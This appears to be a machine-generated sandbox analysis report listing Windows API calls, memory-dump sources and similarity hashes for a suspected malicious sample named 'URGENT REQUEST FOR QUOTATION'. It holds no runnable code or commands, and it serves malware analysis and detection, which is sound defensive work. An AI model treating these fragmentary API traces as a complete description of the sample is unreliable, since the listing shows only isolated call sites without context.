                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2832842796-0
                                                                                                                      • Opcode ID: 8203dec30a848e58fefed41ae2056ab63a4ecc0fabe767e63dd6e76971925346
                                                                                                                      • Instruction ID: ee50e44bbc16235a28d303c08a9254758ff4168a8aa626f80e38563f90080a70
                                                                                                                      • Opcode Fuzzy Hash: 8203dec30a848e58fefed41ae2056ab63a4ecc0fabe767e63dd6e76971925346
                                                                                                                      • Instruction Fuzzy Hash: 4C515975A00619AFDB15DF65C880EAABBF5FF49314F088058E849AB362CB35ED51CF90
                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 000B8F40
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 000B8FD0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 000B8FEC
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 000B9032
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 000B9052
                                                                                                                        • Part of subcall function 0004F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,000A1043,?,753CE610), ref: 0004F6E6
                                                                                                                        • Part of subcall function 0004F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0008FA64,00000000,00000000,?,?,000A1043,?,753CE610,?,0008FA64), ref: 0004F70D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 666041331-0
                                                                                                                      • Opcode ID: e89784f938d645c4b687b311ef24550106e1871519d6ac79896685f3b4f7d312
                                                                                                                      • Instruction ID: 6d05004bf1c1ae1f4aac52dffe36ade55c3aecc79bf02e13a4cf3b08b67a106a
                                                                                                                      • Opcode Fuzzy Hash: e89784f938d645c4b687b311ef24550106e1871519d6ac79896685f3b4f7d312
                                                                                                                      • Instruction Fuzzy Hash: B4513535604205DFCB15EF58C4949EDBBF5FF49314B0880A8E90A9B362DB31ED86CB90
                                                                                                                      APIs
                                                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 000C6C33
                                                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 000C6C4A
                                                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 000C6C73
                                                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,000AAB79,00000000,00000000), ref: 000C6C98
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 000C6CC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3688381893-0
                                                                                                                      • Opcode ID: 2f616260564b1691130adde79e24eb1192074ffcfb0b3362d39e6aa08be2cc35
                                                                                                                      • Instruction ID: c3c5ff4a7c6dab513f0d076fdea1f27a5529048c23246c3e689f2f67d8e17045
                                                                                                                      • Opcode Fuzzy Hash: 2f616260564b1691130adde79e24eb1192074ffcfb0b3362d39e6aa08be2cc35
                                                                                                                      • Instruction Fuzzy Hash: A741AF35A04104AFEB34CF68CD99FBD7BE5EB09350F14022CF899A72A1C372AD41DA80
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 269201875-0
                                                                                                                      • Opcode ID: 389624b06611f0b3e4b571c9cc54f5a921d94351b84027db2c6c91a2c752d478
                                                                                                                      • Instruction ID: b9fb26bbc569e532555f41e19d0d21658d7c5ddb18b9564153c95865b5d6d70e
                                                                                                                      • Opcode Fuzzy Hash: 389624b06611f0b3e4b571c9cc54f5a921d94351b84027db2c6c91a2c752d478
                                                                                                                      • Instruction Fuzzy Hash: 2A41E472A006049FDB24DF78C981AADB7F6EF89314F154569EA15EB352DB31AD01CB80
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 00049141
                                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 0004915E
                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00049183
                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210589936-0
                                                                                                                      • Opcode ID: aa681181faeccf4c4b398145dbf7014e50549dcaa670c1d9fd50f225015a9c76
                                                                                                                      • Instruction ID: 2a0de4980b91f9966b95d07a71defdbbc539fa17d2fc65c4383eabb26749ffd4
                                                                                                                      • Opcode Fuzzy Hash: aa681181faeccf4c4b398145dbf7014e50549dcaa670c1d9fd50f225015a9c76
                                                                                                                      • Instruction Fuzzy Hash: 3741547190851AFBDF15AF68C848BEEB7B4FF05320F204329E469A72E5C7346950CB55
                                                                                                                      APIs
                                                                                                                      • GetInputState.USER32 ref: 000A38CB
                                                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 000A3922
                                                                                                                      • TranslateMessage.USER32(?), ref: 000A394B
                                                                                                                      • DispatchMessageW.USER32(?), ref: 000A3955
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000A3966
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2256411358-0
                                                                                                                      • Opcode ID: 92f2932fc2d75a8a87fba7611ebbd7c55c1b9ba5c198474d81bc96b8ea902458
                                                                                                                      • Instruction ID: 7d5ed7428707f3956824106689c40f10c0da8732824460de69c449ad79d3f374
                                                                                                                      • Opcode Fuzzy Hash: 92f2932fc2d75a8a87fba7611ebbd7c55c1b9ba5c198474d81bc96b8ea902458
                                                                                                                      • Instruction Fuzzy Hash: F7319E70904342AEFB75CBA4D848FB737E8AB07304F04456EF4A6865E0E7F89A85CB11
                                                                                                                      APIs
                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACF38
                                                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 000ACF6F
                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFB4
                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFC8
                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFF2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3191363074-0
                                                                                                                      • Opcode ID: f0dad32f8c9b433a03257d2c295f040a14303c92c67cc737232715ecbd21d481
                                                                                                                      • Instruction ID: 2879c64e82f0e4e1a220bf197012da72afc058d9727206169a91b6b402afbd62
                                                                                                                      • Opcode Fuzzy Hash: f0dad32f8c9b433a03257d2c295f040a14303c92c67cc737232715ecbd21d481
                                                                                                                      • Instruction Fuzzy Hash: 9C3169B1A04205AFFB20DFE5C884EABBBF9EB15350B11443EF50AD2111DB30AE41DBA0
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00091915
                                                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 000919C1
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 000919C9
                                                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 000919DA
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 000919E2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3382505437-0
                                                                                                                      • Opcode ID: 1d650847a08c5d7d90abdd6d7c2ab61fd7c2ecd22bdb713c91aba44caf9ab38d
                                                                                                                      • Instruction ID: 7df250e95047360e7a4141d0f38a99e56ce4f24971e6139532908b3118872a86
                                                                                                                      • Opcode Fuzzy Hash: 1d650847a08c5d7d90abdd6d7c2ab61fd7c2ecd22bdb713c91aba44caf9ab38d
                                                                                                                      • Instruction Fuzzy Hash: 7031BF71A0021AEFEF10CFA8CD99EDE3BB5EB05315F104229F925A72D1C7709944DB90
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 000C5745
                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 000C579D
                                                                                                                      • _wcslen.LIBCMT ref: 000C57AF
                                                                                                                      • _wcslen.LIBCMT ref: 000C57BA
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 000C5816
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 763830540-0
                                                                                                                      • Opcode ID: cb15dff041c471d74227072374fd56f152fc35135770a84b74756b5b96d7861c
                                                                                                                      • Instruction ID: 9b18677795a20835dc1fb050598198edf5b8e1d67fb11151c0c1d4ac0c69937f
                                                                                                                      • Opcode Fuzzy Hash: cb15dff041c471d74227072374fd56f152fc35135770a84b74756b5b96d7861c
                                                                                                                      • Instruction Fuzzy Hash: AC21A5359046189ADB209F60DC85FEE77BCFF04326F10825AE919EA181D770AAC5CF50
                                                                                                                      APIs
                                                                                                                      • IsWindow.USER32(00000000), ref: 000B0951
                                                                                                                      • GetForegroundWindow.USER32 ref: 000B0968
                                                                                                                      • GetDC.USER32(00000000), ref: 000B09A4
                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 000B09B0
                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 000B09E8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4156661090-0
                                                                                                                      • Opcode ID: fc4f8305ba3d7f2dafa8040372f3fdcbb8bab36bf65186407b2fea636b5bd669
                                                                                                                      • Instruction ID: da7c7aa746daf687b1b0a0a47875d91ce33538217e9213c06134dc2dab66edae
                                                                                                                      • Opcode Fuzzy Hash: fc4f8305ba3d7f2dafa8040372f3fdcbb8bab36bf65186407b2fea636b5bd669
                                                                                                                      • Instruction Fuzzy Hash: DC218E35600204AFE714EF65C988EEEBBE9EF49740F048068E84AE7762CB34AC04CB50
                                                                                                                      APIs
                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0006CDC6
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006CDE9
                                                                                                                        • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006CE0F
                                                                                                                      • _free.LIBCMT ref: 0006CE22
                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006CE31
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 336800556-0
                                                                                                                      • Opcode ID: b0d7846289686fdc78b31436ef16b12d4afbe1772f399c04d4d5975a923b0597
                                                                                                                      • Instruction ID: 67447c03cff0402dd761176dc95f327bb7a83c965d49644fbc945f2587af2601
                                                                                                                      • Opcode Fuzzy Hash: b0d7846289686fdc78b31436ef16b12d4afbe1772f399c04d4d5975a923b0597
                                                                                                                      • Instruction Fuzzy Hash: 8A018472A026557F332117B6AC88D7F79BEDFC6BA13190129FD49C7201EA6A8E0191F0
                                                                                                                      APIs
                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 000496A2
                                                                                                                      • BeginPath.GDI32(?), ref: 000496B9
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 000496E2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3225163088-0
                                                                                                                      • Opcode ID: d1a7c995cdfff8e943ee188c2380a5ba27dff0bda453fa35dafd300d94e2b35f
                                                                                                                      • Instruction ID: e16a095929775a27fdaccd210baab0ac4a4d435109c5ffdea00e793ae67c57ed
                                                                                                                      • Opcode Fuzzy Hash: d1a7c995cdfff8e943ee188c2380a5ba27dff0bda453fa35dafd300d94e2b35f
                                                                                                                      • Instruction Fuzzy Hash: 8A219570802305FFEB119F65EC08BAA3BA4BB55319F110235F894965B0D3B898D1CF98
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2931989736-0
                                                                                                                      • Opcode ID: 4410af872f52d8041adfaa6bb68bc273e4007a4508afbff9a865e48397a2a1a7
                                                                                                                      • Instruction ID: 59045a8c0af6f50605717675dcf73ee52064bf3a39f55bce1d81e4f8c1830622
                                                                                                                      • Opcode Fuzzy Hash: 4410af872f52d8041adfaa6bb68bc273e4007a4508afbff9a865e48397a2a1a7
                                                                                                                      • Instruction Fuzzy Hash: CF01D671245605BA9A195652BE92FFFA39D9B20396B004024FE049E242F7B0EF14A3A1
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6), ref: 00062DFD
                                                                                                                      • _free.LIBCMT ref: 00062E32
                                                                                                                      • _free.LIBCMT ref: 00062E59
                                                                                                                      • SetLastError.KERNEL32(00000000,00031129), ref: 00062E66
                                                                                                                      • SetLastError.KERNEL32(00000000,00031129), ref: 00062E6F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3170660625-0
                                                                                                                      • Opcode ID: 40058278375016f5a4968a834f4d85aa9e8bc4376e37a0a8a77d3eae253c0de4
                                                                                                                      • Instruction ID: ea909cefce737d64908a6a13c55818d3e6d81e9b5755d353d147c489ac022432
                                                                                                                      • Opcode Fuzzy Hash: 40058278375016f5a4968a834f4d85aa9e8bc4376e37a0a8a77d3eae253c0de4
                                                                                                                      • Instruction Fuzzy Hash: 3D012836645E0167E72267747C46DAF269FEBD23B1B250038F425A32D3EF7A8C014170
                                                                                                                      APIs
                                                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?,?,0009035E), ref: 0009002B
                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090046
                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090054
                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?), ref: 00090064
                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090070
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3897988419-0
                                                                                                                      • Opcode ID: 9831d8709aaa77137ec124fcd0ab1c35d52a8c679527b966efb261fb432bfc34
                                                                                                                      • Instruction ID: fd80ad919b9ee97255d77c4cb983b8d86fca87c96ad1d2ce2071c6857d4a19b0
                                                                                                                      • Opcode Fuzzy Hash: 9831d8709aaa77137ec124fcd0ab1c35d52a8c679527b966efb261fb432bfc34
                                                                                                                      • Instruction Fuzzy Hash: B4018F72600205BFEF108F68DC04FAE7AEDEB84751F144124F909D2210DB76DD44ABA0
                                                                                                                      APIs
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0009E997
                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 0009E9A5
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 0009E9AD
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0009E9B7
